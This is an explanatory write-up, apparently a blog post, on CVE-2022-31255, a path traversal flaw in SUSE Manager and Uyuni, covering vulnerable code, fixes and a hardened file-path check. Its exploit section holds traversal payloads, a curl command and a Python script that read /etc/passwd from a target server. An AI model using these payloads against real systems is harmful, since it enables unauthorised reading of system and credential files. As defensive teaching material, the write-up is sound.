CVE-2022-31255 is a path traversal vulnerability in several SUSE Uyuni and Spacewalk packages shipped with SUSE Linux Enterprise Module for SUSE Manager Server 4.2 and 4.3. If exploited, a remote attacker can read files on the server that are accessible to the service user (typically tomcat). In practice this means any sensitive file readable by that account, not just files meant to be served, can be retrieved with a crafted request.

The vulnerability affects core pieces like spacewalk-java, spacewalk-web, and tools like spacecmd, stretching across a suite of packages used by system administrators managing large-scale Linux server deployments.

Why Is Path Traversal Dangerous?

Path traversal (also known as "directory traversal") lets an attacker reach files outside the intended directory by manipulating a file path argument. For example, passing ../../etc/passwd in a URL parameter can break out of the web root and read system files; the same trick works with encoded forms such as ..%2f when the server decodes the parameter before building the path.

Affected packages include (any version below the fixed release named in the advisory):

- hub-xmlrpc-api < 0.7
- ...and more (full affected package list in SUSE's advisory)

If you’re running an unpatched version of SUSE Manager Server 4.2/4.3 or Uyuni with these modules, you’re at risk.

How Does the Exploit Work? (Technical Details)

Under the hood, this vulnerability occurs because the software fails to validate file path inputs. When an API endpoint or web handler receives a filename (via HTTP parameters, POST data, or XMLRPC), it should _restrict_ access to files inside a certain directory. But due to improper implementation, attackers can slip in ../ directory jumps.

Suppose the web app exposes an endpoint like

GET /download?file=report.txt

But it does *not* check that the supplied filename stays within /srv/www/appfiles. An attacker can therefore request:

GET /download?file=../../../../etc/passwd

In Python (simplified), the vulnerable code looks like this:

from flask import Flask, request, send_file
import os

app = Flask(__name__)

@app.route('/download')
def download_file():
    filename = request.args.get('file', '')                  # user-controlled input, never validated
    file_path = os.path.join('/srv/www/appfiles', filename)  # '..' segments survive the join, and an
                                                             # absolute filename even discards the base
    return send_file(file_path)                              # serves whatever the resolved path points to

If filename is "../../../../etc/passwd", os.path.join does nothing to stop the traversal and send_file hands back /etc/passwd, or any other file the Tomcat service user can read. (A file such as /etc/shadow is readable only by root, so it would not leak unless the service itself runs as root.)

You can test for this vulnerability with any HTTP client. Note that /download and the file parameter are the illustrative endpoint from the example above, not the real Uyuni/SUSE Manager URL; substitute the endpoint and parameter from the advisory. Here's a curl example:

# Attempt to read /etc/passwd from a vulnerable server
curl "https://target-server/download?file=../../../../etc/passwd"

Or with Python's requests library:

import requests

target = "https://victim-server/download"   # illustrative endpoint, see above
payload = "../../../../../etc/passwd"

# params= URL-encodes the payload; the server decodes it again before the
# vulnerable join, so the '../' segments arrive intact.
r = requests.get(target, params={'file': payload}, timeout=10)

if r.status_code == 200 and "root:x:" in r.text:
    print("Server is vulnerable! /etc/passwd contents:")
    print(r.text)
else:
    print("Not vulnerable, or /etc/passwd not accessible.")

Important: Responsible use only — do not test this on servers you don't own or have authorization to scan.

Real-World Impact

- Sensitive file disclosure: /etc/passwd, application credentials, private configuration files.
- Attack escalation: configuration files readable by the Tomcat user may hold database or API credentials and keys, which an attacker can use to move further into the system.


## How To Fix / Protect Yourself

Update every affected package to the fixed version listed in SUSE's advisory, for example:

- spacewalk-web 4.2.30 or newer (see official SUSE patch bulletin)

### Workaround / Defense in Depth

1. Filter input: only accept whitelisted filename values, never user-controlled file paths.

2. Reject ".." or "/" in filename parameters, and treat absolute paths and encoded variants such as %2e%2e the same way.

3. Use realpath and a directory check before serving files. Most web frameworks ship a helper for exactly this (Flask's send_from_directory, for instance); prefer it over a hand-rolled check, but if you must write one, it should look like this:

import os
from flask import abort, request, send_file

def is_safe_path(basedir, path):
    # Resolve symlinks and '..' on both sides, then require the resolved file to
    # sit under the resolved base. Compare with commonpath rather than startswith:
    # a plain prefix test would accept '/srv/www/appfiles_old/x' as inside
    # '/srv/www/appfiles'.
    base = os.path.realpath(basedir)
    real = os.path.realpath(path)
    return os.path.commonpath([base, real]) == base

base_path = '/srv/www/appfiles'
filename = request.args.get('file', '')        # user input, as in the vulnerable handler
file_path = os.path.join(base_path, filename)  # an absolute filename discards base_path here,
                                               # which is exactly why the check below is needed
if is_safe_path(base_path, file_path):
    send_file(file_path)
else:
    abort(403)
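As an added worked example (not code from this page, nor from SUSE, Uyuni or Spacewalk), the stdlib-only Python script below puts the flawed join from the vulnerable handler in the "How Does the Exploit Work?" section next to the hardened check from the workaround above, and runs both over a set of constructed payloads. The base directory /srv/www/appfiles, the payload strings and all function names are assumptions for illustration. It goes beyond the text in two ways: it shows why a plain startswith prefix test is not enough (a sibling directory that shares the prefix), and why realpath rather than normpath is needed (a symlink inside the base pointing outside it, built in a temporary directory so the script runs offline).

```python
import os
import tempfile

# Hypothetical base directory, reused from the vulnerable handler above.
BASE_DIR = "/srv/www/appfiles"


def vulnerable_resolve(base, user_input):
    """Mirror of the flawed handler: os.path.join, then straight to the file API.
    Returns the path the OS would actually open (normalised, never validated)."""
    return os.path.normpath(os.path.join(base, user_input))


def naive_check(base, user_input):
    """A common but insufficient fix: a string-prefix test on the normalised path.
    It passes sibling directories that share the prefix and never sees symlinks."""
    return os.path.normpath(os.path.join(base, user_input)).startswith(base)


def safe_resolve(base, user_input):
    """Hardened resolution: resolve symlinks and '..' with realpath, then require the
    result to lie inside the real base directory. Returns the resolved path, or None
    when the request is rejected. The check runs on exactly the string the file API
    would open, so no extra URL-decoding happens here: after the server's single
    decode, a double-encoded '%2e%2e' is just a literal directory name."""
    real_base = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(real_base, user_input))
    # commonpath rather than startswith: '/srv/www/appfiles_old' shares the prefix of
    # '/srv/www/appfiles' but is not inside it.
    if os.path.commonpath([real_base, candidate]) != real_base:
        return None
    return candidate


# Constructed payloads, written as the web framework delivers the ?file= parameter
# to the handler, i.e. after one round of URL decoding.
PAYLOADS = [
    "report.txt",                   # legitimate request
    "../../../../etc/passwd",       # classic traversal
    "/etc/passwd",                  # absolute path: os.path.join discards the base entirely
    "%2e%2e/%2e%2e/etc/passwd",     # double-encoded traversal, still literal after one decode
    "sub/../report.txt",            # '..' that never leaves the base
    "../appfiles_old/secret.conf",  # prefix collision that fools a startswith check
]


def compare(base=BASE_DIR):
    """Map each payload to (path the vulnerable handler opens, naive check verdict,
    hardened result or None)."""
    return {p: (vulnerable_resolve(base, p), naive_check(base, p), safe_resolve(base, p))
            for p in PAYLOADS}


def symlink_escape_demo():
    """Why realpath matters: a symlink inside the base that points outside it passes
    the naive prefix test but is rejected by the hardened check. Everything is built
    in a temporary directory so the demo runs offline. Returns (naive_allows,
    hardened_allows)."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "appfiles")
        os.mkdir(base)
        secret = os.path.join(tmp, "secret.txt")   # sits outside the base directory
        with open(secret, "w") as fh:
            fh.write("not for download\n")
        os.symlink(secret, os.path.join(base, "link.txt"))
        return naive_check(base, "link.txt"), safe_resolve(base, "link.txt") is not None


if __name__ == "__main__":
    for payload, (opened, naive_ok, hardened) in compare().items():
        print(f"{payload!r:32} vulnerable opens {opened!r:44} naive={naive_ok!s:5} hardened={hardened!r}")
    print("symlink escape (naive_allows, hardened_allows):", symlink_escape_demo())
```

Running it shows the classic and absolute-path payloads resolving to /etc/passwd in the vulnerable version and being rejected by the hardened one, the prefix-collision payload slipping past the naive check only, and the double-encoded payload being harmless because it never left the base directory in the first place.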

References & More Reading

- SUSE Official Security Announcement
- NVD Entry for CVE-2022-31255
- Uyuni GitHub
- OWASP Path Traversal Cheat Sheet

Summary

CVE-2022-31255 is a classic path traversal bug, but it hit SUSE Manager and Uyuni — core tools for managing Linux infrastructure — making it a high-priority fix for SysAdmins. By abusing poorly checked file requests, attackers can harvest sensitive files using nothing more than a web request.

Timeline

Published on: 11/10/2022 15:15:00 UTC
Last modified on: 11/16/2022 18:01:00 UTC